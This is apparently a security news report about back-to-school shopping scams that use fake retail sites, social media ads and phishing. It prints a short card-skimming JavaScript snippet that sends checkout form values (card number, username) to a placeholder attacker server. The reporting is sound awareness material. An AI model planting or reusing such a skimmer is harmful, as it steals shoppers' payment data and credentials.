As families across the country prepare for the return to school, cybercriminals are exploiting the seasonal rush with a fresh wave of sophisticated shopping scams.

Leveraging peaks in online spending, scammers are deploying malicious campaigns that prey on unsuspecting users searching for supply deals and exclusive offers.

The emergence of these scams coincides with growing reports of counterfeit retail websites, manipulated delivery notifications, and clever phishing lures—all meticulously engineered to harvest personal and payment credentials.

This year’s campaign distinguishes itself through the deployment of convincingly crafted fake sites, which are widely disseminated via sponsored search placements, email promotions, and—most notably—social media ads.

These phony adverts boast attractive deals on everything from classroom essentials to big-ticket electronics, employing AI-driven visuals to mimic reputable retailers.

The seamless experience these sites offer belies their fraudulent intent, with many victims only realizing the deception after funds are lost or private data compromised.

McAfee analysts identified this coordinated threat surge in early August, following a marked increase in user reports and threat telemetry.

Their research revealed that these scammers employ automated platforms to quickly spin up vast quantities of fake shopping portals.

Scammers using social media

Each site is engineered to evade basic detection, using randomized domain registrations and SSL certificates to bolster apparent legitimacy.

These technical ploys, combined with aggressive promotion on social platforms, funnel a high volume of web traffic through malicious infrastructure.

A particularly insidious technical vector uncovered by McAfee researchers involves backend JavaScript payloads embedded in checkout pages.

Upon form submission, these scripts invisibly relay harvested credit card numbers and login credentials to attacker-controlled servers, often encrypting transmissions to circumvent basic network filters.

The embedded payload resembles the following obfuscated pattern:-

(function(){
  var xhr=new XMLHttpRequest();
  xhr.open('POST','https://malicious-server.com/collect',true);
  xhr.setRequestHeader('Content-Type','application/json');
  xhr.send(JSON.stringify({card:document.getElementById('cc_num').value,user:document.getElementById('usr').value}));
})();

This approach not only enables immediate credential exfiltration but also provides attackers with a persistent foothold for further account compromise.

As the back-to-school season continues, users—especially those enticed by unfamiliar retailers and urgent promotional ads—remain prime targets for such advanced and evolving scams.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Beware of New back-to-school Shopping Scams That Tricks Drives Users to Fake Shopping Sites appeared first on Cyber Security News.